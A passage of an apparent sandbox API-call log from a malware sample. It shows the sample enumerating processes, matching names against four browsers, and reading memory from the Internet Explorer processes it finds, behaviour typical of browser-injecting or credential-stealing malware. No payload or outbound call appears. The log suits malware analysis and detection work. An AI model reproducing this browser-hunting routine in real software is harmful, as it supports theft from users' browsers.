	[0228.367] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0228.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.368] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0228.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x63d4
	[0228.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.369] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0228.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.370] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.371] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0228.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.371] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.372] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0228.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x63d8
	[0228.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.373] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0228.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.373] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.374] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0228.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.374] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.375] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0228.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x63dc
	[0228.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.376] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0228.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.376] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0228.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.377] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0228.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.377] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.377] NtQueryInformationProcess (in: ProcessHandle=0x63dc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0228.378] ReadProcessMemory (in: hProcess=0x63dc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0228.378] ReadProcessMemory (in: hProcess=0x63dc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0228.378] ReadProcessMemory (in: hProcess=0x63dc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0228.378] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0228.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0228.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x63e0
	[0228.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.379] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0228.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.379] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0228.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.380] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0228.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.380] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.380] NtQueryInformationProcess (in: ProcessHandle=0x63e0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0228.380] ReadProcessMemory (in: hProcess=0x63e0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0228.380] ReadProcessMemory (in: hProcess=0x63e0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0228.380] ReadProcessMemory (in: hProcess=0x63e0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0228.380] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0228.381] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0228.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x63e4
	[0228.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.382] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0228.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.382] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.382] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0228.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.383] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.383] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0228.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x63e8
	[0228.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.384] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0228.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.384] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.385] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0228.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.385] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x63ec
	[0228.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.386] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.387] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.387] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.387] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.388] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.388] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.389] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x63f0
	[0228.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.389] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.390] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.390] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.390] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.391] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x63f4
	[0228.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.391] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.392] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.392] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.393] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.393] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0228.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x63f8
	[0228.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.394] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0228.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.394] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.394] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0228.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.395] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.395] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0228.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x63fc
	[0228.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.396] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.396] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.397] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.397] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.397] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6400
	[0228.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.398] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.399] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.399] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.399] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0228.404] CloseHandle (hObject=0x4fd0) returned 1
	[0228.404] Sleep (dwMilliseconds=0x64) 
	[0228.511] GetCurrentProcessId () returned 0x110
	[0228.511] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0228.518] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0228.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0228.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0228.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6404
	[0228.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.526] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.527] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.527] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.527] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0228.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6408
	[0228.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.528] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.529] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.529] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.529] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0228.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x640c
	[0228.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.530] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0228.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.531] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.531] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0228.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.531] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0228.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6410
	[0228.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.533] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0228.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.533] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.533] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0228.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.533] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0228.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6414
	[0228.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.535] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0228.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.535] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.535] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0228.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.536] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0228.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6418
	[0228.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.537] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0228.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.537] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.538] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0228.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.538] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.538] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0228.539] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x641c
	[0228.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.539] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0228.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.539] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.540] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0228.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.540] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0228.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6420
	[0228.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.657] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0228.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.658] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.658] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0228.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.658] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.658] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6424
	[0228.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.659] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.660] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.660] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.660] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.660] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
